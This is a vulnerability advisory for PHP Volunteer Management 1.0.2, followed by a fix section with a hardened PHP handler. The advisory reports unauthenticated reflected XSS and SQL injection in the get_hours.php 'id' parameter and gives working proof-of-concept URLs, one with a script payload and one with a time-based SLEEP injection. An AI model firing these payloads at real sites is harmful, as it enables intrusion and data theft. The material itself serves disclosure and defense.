

PHP Volunteer Management 1.0.2 Multiple Vulnerabilities and Fix

Source: 自学PHP网    Date: 2015-04-17 13:02


Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
Author: G13 www.2cto.com
Download: https://sourceforge.net/projects/phpvolunteer/
Affected version: 1.0.2
 
0x01 Description
0x02 XSS
0x03 SQL Injection
0x04 Vendor Report
 
##### 0x01 Description #####
 
This is PHP volunteer management software that keeps track of volunteer
hours worked and location assignments. The system is built on
PHP/MySQL.
 
##### 0x02 XSS #####
 
---------------Vulnerability-------------------
 
The 'id' parameter on the get_hours.php page is vulnerable to XSS. No
authentication is needed. This is a reflected XSS vulnerability.
 
----------Test-----------------------------------
 
http://www.2cto.com/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10
 
------------Exploit---------------------------
 
http://www.2cto.com/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10
 
##### 0x03 SQL Injection #####
 
---------------Vulnerability-------------------
 
The 'id' parameter on the get_hours.php page is also vulnerable to SQL
injection. No authentication is needed.
 
----------Test-----------------------------------
 
http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
 
------------Exploit---------------------------
 
http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
 
Fix:

Apply the appropriate filtering to the 'id' parameter.
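As an added illustration of that fix (not code from the PHP Volunteer Management project), the following hardened handler shows how the get_hours.php request described above can validate the 'id' parameter before it reaches the query or the response; the table and column names, the PDO connection details and the JSON response shape are assumptions.

```php
<?php
// Added example, not the project's code: a hardened get_hours.php handler.
// The table/column names and the PDO connection details are assumptions.

function read_int_param(string $name, int $default, int $min, int $max): int
{
    // FILTER_VALIDATE_INT accepts only a plain integer in range, so payloads
    // like "1' AND SLEEP(5)..." or "<script>" never reach the query or response.
    $value = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return ($value === false || $value === null) ? $default : $value;
}

function get_hours(PDO $db, int $id, int $take, int $skip): array
{
    // Bound parameters keep user data out of the SQL text entirely;
    // LIMIT/OFFSET are bound as integers because MySQL rejects quoted values there.
    $stmt = $db->prepare(
        'SELECT id, volunteer_id, location, hours_worked, worked_on
           FROM volunteer_hours WHERE volunteer_id = :id
          ORDER BY worked_on DESC LIMIT :take OFFSET :skip'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':take', $take, PDO::PARAM_INT);
    $stmt->bindValue(':skip', $skip, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The advisory notes the endpoint needs no authentication; if it is meant to be
// restricted, the session/login check belongs here, before any query runs.
$id   = read_int_param('id', 0, 1, PHP_INT_MAX);
$take = read_int_param('take', 10, 1, 100);
$skip = read_int_param('skip', 0, 0, PHP_INT_MAX);

if ($id === 0) {          // missing or malformed id: refuse instead of reflecting it
    http_response_code(400);
    exit;
}

$db = new PDO('mysql:host=localhost;dbname=volunteer;charset=utf8mb4', 'user', 'pass',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]);

// A JSON content type plus HTML-escaped encoding means a browser will not
// render any reflected value (including the id) as markup.
header('Content-Type: application/json; charset=utf-8');
echo json_encode(['id' => $id, 'data' => get_hours($db, $id, $take, $skip)],
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
```

With this in place both proof-of-concept URLs above receive a 400 response, since neither payload passes integer validation.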
